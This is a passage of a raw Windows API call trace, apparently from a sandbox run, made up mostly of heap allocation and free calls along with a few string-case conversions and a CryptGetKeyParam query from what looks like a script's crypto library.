hHeap=0x1780000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cfb) returned 0x4516010 [0103.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29c0 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0103.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a50 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0103.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a90 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cfb) returned 0x499a008 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0103.736] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0103.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0103.736] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0103.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.737] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0103.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0103.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.737] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0103.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0103.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.738] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.739] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0103.740] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0103.740] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0103.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.744] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.744] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0103.794] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2ab0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2ab0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0103.794] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.795] CharLowerBuffW (in: 